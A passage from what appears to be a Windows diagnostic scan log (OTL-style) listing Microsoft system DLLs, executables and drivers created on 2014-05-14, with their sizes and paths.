(Microsoft Corporation) -- C:\windows\SysWow64\dmdskmgr.dll [2014-05-14 16:00:48 | 000,141,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dot3mm.dll [2014-05-14 16:00:47 | 002,043,904 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\inetcpl.cpl [2014-05-14 16:00:46 | 000,189,784 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\UCX01000.SYS [2014-05-14 16:00:45 | 000,453,120 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dxtmsft.dll [2014-05-14 16:00:45 | 000,325,464 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\USBXHCI.SYS [2014-05-14 16:00:45 | 000,296,960 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dxtrans.dll [2014-05-14 16:00:44 | 000,127,488 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\migisol.dll [2014-05-14 16:00:44 | 000,045,568 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\acppage.dll [2014-05-14 16:00:44 | 000,038,680 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\LockScreenContentServer.exe [2014-05-14 16:00:43 | 000,089,848 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ncryptsslp.dll [2014-05-14 16:00:42 | 000,052,736 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AppxSysprep.dll [2014-05-14 16:00:41 | 001,290,688 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msctf.dll [2014-05-14 16:00:41 | 000,245,248 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Networking.Vpn.dll [2014-05-14 16:00:41 | 000,057,344 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SrTasks.exe [2014-05-14 16:00:41 | 000,027,648 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WofTasks.dll [2014-05-14 16:00:40 | 000,155,136 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SettingMonitor.dll [2014-05-14 16:00:40 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ieUnatt.exe [2014-05-14 16:00:40 | 000,068,096 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\UXInit.dll [2014-05-14 16:00:40 | 000,067,584 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\powercfg.exe [2014-05-14 16:00:36 | 000,136,192 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\diskpart.exe [2014-05-14 16:00:35 | 001,445,616 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\webservices.dll [2014-05-14 16:00:35 | 000,156,672 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\slc.dll [2014-05-14 16:00:35 | 000,123,904 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sppc.dll [2014-05-14 16:00:34 | 000,041,472 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\f3ahvoas.dll [2014-05-14 16:00:33 | 001,727,760 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ntdll.dll [2014-05-14 16:00:33 | 000,530,944 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AppReadiness.dll [2014-05-14 16:00:33 | 000,349,696 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\bcdedit.exe [2014-05-14 16:00:33 | 000,232,448 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\InputSwitch.dll [2014-05-14 16:00:33 | 000,034,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\dataclen.dll [2014-05-14 16:00:32 | 000,874,496 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\autofmt.exe [2014-05-14 16:00:32 | 000,704,512 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Security.Authentication.OnlineId.dll [2014-05-14 16:00:32 | 000,286,720 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wlidcredprov.dll [2014-05-14 16:00:32 | 000,198,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wpnprv.dll [2014-05-14 16:00:32 | 000,095,744 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\IdCtrls.dll [2014-05-14 16:00:32 | 000,089,848 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\RestoreOptIn.exe [2014-05-14 16:00:32 | 000,043,408 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\CloudNotifications.exe [2014-05-14 16:00:31 | 000,825,344 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\samsrv.dll [2014-05-14 16:00:31 | 000,586,240 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\qedit.dll [2014-05-14 16:00:31 | 000,260,608 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\BioCredProv.dll [2014-05-14 16:00:31 | 000,184,320 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\deviceaccess.dll [2014-05-14 16:00:31 | 000,110,592 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\samlib.dll [2014-05-14 16:00:30 | 000,653,312 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\DismApi.dll [2014-05-14 16:00:30 | 000,463,872 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\RASMM.dll [2014-05-14 16:00:30 | 000,193,024 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winsrv.dll [2014-05-14 16:00:30 | 000,143,872 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\BootMenuUX.dll [2014-05-14 16:00:30 | 000,033,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\BasicRender.sys [2014-05-14 16:00:30 | 000,018,432 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WofUtil.dll [2014-05-14 16:00:27 | 000,249,856 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rascustom.dll [2014-05-14 16:00:27 | 000,208,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.ApplicationModel.Store.dll [2014-05-14 16:00:26 | 000,745,328 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\oleaut32.dll [2014-05-14 16:00:26 | 000,484,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\untfs.dll [2014-05-14 16:00:26 | 000,079,192 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\sdstor.sys [2014-05-14 16:00:24 | 000,233,472 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Devices.HumanInterfaceDevice.dll [2014-05-14 16:00:24 | 000,155,648 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MicrosoftAccountTokenProvider.dll [2014-05-14 16:00:24 | 000,138,752 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\DWWIN.EXE [2014-05-14 16:00:23 | 001,057,792 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\printui.dll [2014-05-14 16:00:23 | 000,890,880 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\autochk.exe [2014-05-14 16:00:23 | 000,835,584 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\rasgcw.dll [2014-05-14 16:00:23 | 000,619,520 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\UserLanguagesCpl.dll [2014-05-14 16:00:23 | 000,074,752 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Networking.Sockets.PushEnabledApplication.dll [2014-05-14 16:00:22 | 000,459,264 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\SettingSync.dll [2014-05-14 16:00:22 | 000,094,720 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\spcompat.dll [2014-05-14 16:00:22 | 000,018,432 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\energytask.dll [2014-05-14 16:00:20 | 000,275,456 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\authz.dll [2014-05-14 16:00:20 | 000,128,512 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\CloudStorageWizard.exe [2014-05-14 16:00:20 | 000,121,856 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\SkyDriveShell.dll [2014-05-14 16:00:19 | 000,709,120 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\msctfuimanager.dll [2014-05-14 16:00:19 | 000,569,856 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wpncore.dll [2014-05-14 16:00:19 | 000,561,664 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\dfrgui.exe [2014-05-14 16:00:19 | 000,518,144 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\MrmIndexer.dll [2014-05-14 16:00:19 | 000,112,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\scavengeui.dll [2014-05-14 16:00:19 | 000,038,400 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\JavaScriptCollectionAgent.dll [2014-05-14 16:00:19 | 000,028,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\f3ahvoas.dll [2014-05-14 16:00:18 | 008,946,688 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\glcndFilter.dll [2014-05-14 16:00:18 | 000,467,456 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\srcore.dll [2014-05-14 16:00:18 | 000,271,872 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rstrui.exe [2014-05-14 16:00:18 | 000,070,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\srclient.dll [2014-05-14 16:00:17 | 001,927,600 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\combase.dll [2014-05-14 16:00:17 | 001,000,424 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WinTypes.dll [2014-05-14 16:00:17 | 000,553,472 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Security.Authentication.OnlineId.dll [2014-05-14 16:00:17 | 000,355,328 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wincorlib.dll [2014-05-14 16:00:17 | 000,308,224 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\srchadmin.dll [2014-05-14 16:00:17 | 000,185,856 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wlidcredprov.dll [2014-05-14 16:00:17 | 000,115,712 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winbici.dll [2014-05-14 16:00:16 | 012,027,904 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Data.Pdf.dll [2014-05-14 16:00:16 | 001,435,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sppobjs.dll [2014-05-14 16:00:16 | 000,488,448 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\qedit.dll [2014-05-14 16:00:16 | 000,226,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\BthLEEnum.sys [2014-05-14 16:00:16 | 000,147,968 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\deviceaccess.dll [2014-05-14 16:00:15 | 000,592,896 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\sud.dll [2014-05-14 16:00:15 | 000,269,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\bisrv.dll [2014-05-14 16:00:14 | 000,721,408 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\twinapi.dll [2014-05-14 16:00:13 | 001,258,496 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\RacEngn.dll [2014-05-14 16:00:13 | 000,244,848 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sppwinob.dll [2014-05-14 16:00:12 | 000,155,136 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Devices.HumanInterfaceDevice.dll [2014-05-14 16:00:12 | 000,116,736 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\MicrosoftAccountTokenProvider.dll [2014-05-14 16:00:12 | 000,027,648 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\SettingSyncPolicy.dll [2014-05-14 16:00:11 | 000,275,456 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Dism.exe [2014-05-14 16:00:10 | 002,843,136 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\actxprxy.dll [2014-05-14 16:00:10 | 000,289,752 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sqmapi.dll [2014-05-14 16:00:10 | 000,051,712 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\ConfigureExpandedStorage.dll [2014-05-14 16:00:09 | 000,878,592 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ActionCenter.dll [2014-05-14 16:00:09 | 000,014,848 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\clrhost.dll [2014-05-14 16:00:04 | 000,752,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\tdh.dll [2014-05-14 16:00:04 | 000,397,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sharemediacpl.dll [2014-05-14 16:00:02 | 000,504,832 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\DevicePairing.dll [2014-05-14 16:00:02 | 000,203,776 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\PlayToDevice.dll [2014-05-14 16:00:02 | 000,177,664 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\easwrt.dll [2014-05-14 16:00:01 | 000,388,096 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ninput.dll [2014-05-14 16:00:00 | 000,068,096 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\setbcdlocale.dll [2014-05-14 15:59:59 | 001,374,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\combase.dll [2014-05-14 15:59:59 | 000,897,024 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\sdclt.exe [2014-05-14 15:59:59 | 000,506,120 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\WinTypes.dll [2014-05-14 15:59:59 | 000,336,232 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\bcryptprimitives.dll [2014-05-14 15:59:59 | 000,256,000 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\wincorlib.dll [2014-05-14 15:59:59 | 000,152,848 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\bcrypt.dll [2014-05-14 15:59:58 | 000,791,552 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\uDWM.dll [2014-05-14 15:59:58 | 000,336,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\MbaeApiPublic.dll [2014-05-14 15:59:57 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\offreg.dll [2014-05-14 15:59:57 | 000,054,816 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\wpcfltr.sys [2014-05-14 15:59:55 | 002,288,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SyncCenter.dll [2014-05-14 15:59:52 | 000,556,032 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\twinapi.dll [2014-05-14 15:59:51 | 002,760,704 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wpccpl.dll [2014-05-14 15:59:51 | 001,640,960 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.UI.Immersive.dll [2014-05-14 15:59:51 | 001,341,440 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\dui70.dll [2014-05-14 15:59:51 | 000,159,744 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\thumbcache.dll [2014-05-14 15:59:51 | 000,029,912 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\UserAccountBroker.exe [2014-05-14 15:59:50 | 001,653,352 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WindowsCodecs.dll [2014-05-14 15:59:50 | 001,008,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WlanMM.dll [2014-05-14 15:59:50 | 000,112,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\fsutil.exe [2014-05-14 15:59:49 | 000,316,416 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winsku.dll [2014-05-14 15:59:49 | 000,113,152 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\shsetup.dll [2014-05-14 15:59:49 | 000,059,392 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\StorageContextHandler.dll [2014-05-14 15:59:49 | 000,036,352 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winbrand.dll [2014-05-14 15:59:49 | 000,014,848 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\slpts.dll [2014-05-14 15:59:46 | 000,517,120 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\SettingSyncHost.exe [2014-05-14 15:59:46 | 000,135,168 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\netid.dll [2014-05-14 15:59:45 | 001,519,520 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\user32.dll [2014-05-14 15:59:45 | 000,390,656 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\DfpCommon.dll [2014-05-14 15:59:45 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\easwrt.dll [2014-05-14 15:59:45 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WindowsAnytimeUpgradeResults.exe [2014-05-14 15:59:45 | 000,031,232 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dfp.exe [2014-05-14 15:59:44 | 000,144,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\rpchttp.dll [2014-05-14 15:59:43 | 002,811,392 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\themeui.dll [2014-05-14 15:59:43 | 000,461,176 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WerFault.exe [2014-05-14 15:59:43 | 000,407,536 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Faultrep.dll [2014-05-14 15:59:43 | 000,307,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wintrust.dll [2014-05-14 15:59:43 | 000,036,200 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\WerFaultSecure.exe [2014-05-14 15:59:42 | 000,366,080 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wcmsvc.dll [2014-05-14 15:59:42 | 000,359,936 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\vmrdvcore.dll [2014-05-14 15:59:42 | 000,273,408 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dmdskmgr.dll [2014-05-14 15:59:42 | 000,251,904 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\MbaeApiPublic.dll [2014-05-14 15:59:42 | 000,102,912 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wcmcsp.dll [2014-05-14 15:59:42 | 000,099,840 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\AuthBroker.dll [2014-05-14 15:59:41 | 000,615,936 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\rdbui.dll [2014-05-14 15:59:41 | 000,173,568 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\syncui.dll [2014-05-14 15:59:41 | 000,162,816 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ocsetapi.dll [2014-05-14 15:59:41 | 000,137,216 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\PlayToManager.dll [2014-05-14 15:59:40 | 000,562,176 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\winlogon.exe [2014-05-14 15:59:40 | 000,322,048 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\fhcpl.dll [2014-05-14 15:59:39 | 001,496,576 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.UI.Immersive.dll [2014-05-14 15:59:39 | 001,132,032 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Globalization.dll [2014-05-14 15:59:39 | 000,546,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\AppxPackaging.dll [2014-05-14 15:59:39 | 000,323,584 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\GlobCollationHost.dll [2014-05-14 15:59:39 | 000,173,056 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\werui.dll [2014-05-14 15:59:39 | 000,156,160 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\aitagent.exe [2014-05-14 15:59:39 | 000,094,560 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\bcd.dll [2014-05-14 15:59:38 | 000,236,888 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\sdbus.sys [2014-05-14 15:59:38 | 000,151,384 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\dumpsd.sys [2014-05-14 15:59:38 | 000,151,040 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\dmvdsitf.dll [2014-05-14 15:59:38 | 000,032,088 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ploptin.dll [2014-05-14 15:59:38 | 000,012,288 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\clrhost.dll [2014-05-14 15:59:37 | 000,477,744 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\SHCore.dll [2014-05-14 15:59:37 | 000,321,536 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\stobject.dll [2014-05-14 15:59:37 | 000,146,776 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\msgpioclx.sys [2014-05-14 15:59:31 | 001,967,104 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\inetcpl.cpl [2014-05-14 15:59:31 | 000,242,688 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\mdmregistration.dll [2014-05-14 15:59:31 | 000,142,576 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\smss.exe [2014-05-14 15:59:31 | 000,079,872 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\powercfg.exe [2014-05-14 15:59:29 | 000,283,136 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wbadmin.exe [2014-05-14 15:59:29 | 000,195,584 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\PkgMgr.exe [2014-05-14 15:59:29 | 000,123,448 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dwmapi.dll [2014-05-14 15:59:29 | 000,109,056 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\SSShim.dll [2014-05-14 15:59:29 | 000,079,496 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\bcd.dll [2014-05-14 15:59:29 | 000,068,096 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\spbcd.dll [2014-05-14 15:59:29 | 000,054,272 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\watchdog.sys [2014-05-14 15:59:28 | 000,105,864 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ncryptsslp.dll [2014-05-14 15:59:28 | 000,097,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\migisol.dll [2014-05-14 15:59:27 | 001,163,264 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\uxtheme.dll [2014-05-14 15:59:27 | 000,316,416 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\BioCredProv.dll [2014-05-14 15:59:27 | 000,275,312 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\powrprof.dll [2014-05-14 15:59:27 | 000,213,504 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\cleanmgr.exe [2014-05-14 15:59:27 | 000,146,944 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\korwbrkr.dll [2014-05-14 15:59:26 | 000,299,008 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.ApplicationModel.Store.dll [2014-05-14 15:59:26 | 000,146,944 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\diskpart.exe [2014-05-14 15:59:26 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\iesetup.dll [2014-05-14 15:59:26 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\iernonce.dll [2014-05-14 15:59:26 | 000,018,944 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\vhdparser.sys [2014-05-14 15:59:25 | 002,825,216 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\ExplorerFrame.dll [2014-05-14 15:59:25 | 000,792,576 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\Windows.Globalization.dll [2014-05-14 15:59:25 | 000,761,792 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\iuilp.dll [2014-05-14 15:59:25 | 000,202,240 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\GlobCollationHost.dll [2014-05-14 15:59:25 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\UXInit.dll [2014-05-14 15:59:24 | 001,077,944 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\webservices.dll [2014-05-14 15:59:24 | 000,095,232 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\sppc.dll [2014-05-14 15:59:24 | 000,039,936 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\dataclen.dll [2014-05-14 15:59:23 | 000,669,896 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\advapi32.dll [2014-05-14 15:59:23 | 000,469,504 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\taskeng.exe [2014-05-14 15:59:23 | 000,372,568 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\storport.sys [2014-05-14 15:59:23 | 000,160,256 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\DWWIN.EXE [2014-05-14 15:59:23 | 000,054,784 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\fveskybackup.dll [2014-05-14 15:59:22 | 003,494,912 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\tquery.dll [2014-05-14 15:59:22 | 002,368,512 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mssrch.dll [2014-05-14 15:59:22 | 000,752,640 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mssvp.dll [2014-05-14 15:59:22 | 000,441,344 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mssph.dll [2014-05-14 15:59:22 | 000,320,000 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SearchProtocolHost.exe [2014-05-14 15:59:22 | 000,194,560 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SearchFilterHost.exe [2014-05-14 15:59:22 | 000,132,608 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\mssprxy.dll [2014-05-14 15:59:22 | 000,013,824 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msshooks.dll [2014-05-14 15:59:21 | 001,185,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\printui.dll [2014-05-14 15:59:21 | 000,492,032 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\PrintDialogs.dll [2014-05-14 15:59:21 | 000,101,216 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\RestoreOptIn.exe [2014-05-14 15:59:20 | 001,152,512 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wscui.cpl [2014-05-14 15:59:20 | 000,780,288 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\autofmt.exe [2014-05-14 15:59:20 | 000,559,104 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\Windows.Networking.Connectivity.dll [2014-05-14 15:59:20 | 000,470,016 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\timedate.cpl [2014-05-14 15:59:20 | 000,384,856 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\drivers\spaceport.sys [2014-05-14 15:59:20 | 000,164,352 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\wscinterop.dll [2014-05-14 15:59:20 | 000,041,320 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\CloudNotifications.exe [2014-05-14 15:59:19 | 000,248,832 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\srrstr.dll [2014-05-14 15:59:17 | 000,459,776 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\DismApi.dll [2014-05-14 15:59:17 | 000,236,544 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\vdsbas.dll [2014-05-14 15:59:17 | 000,226,304 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SndVolSSO.dll [2014-05-14 15:59:17 | 000,210,736 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SndVol.exe [2014-05-14 15:59:17 | 000,193,024 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\bthprops.cpl [2014-05-14 15:59:17 | 000,130,560 | ---- | C] (Microsoft Corporation) -- C:\windows\SysWow64\SettingMonitor.dll [2014-05-14 15:59:16 | 000,755,200 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\msctfuimanager.dll [2014-05-14 15:59:16 | 000,545,280 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\untfs.dll [2014-05-14 15:59:16 | 000,468,480 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\SystemSettings.Handlers.dll [2014-05-14 15:59:15 | 002,706,432 | ---- | C] (Microsoft Corporation) -- C:\windows\SysNative\gameux.dll [2014-05-14 15:59:15 | 000,935,424 | ---- | C] 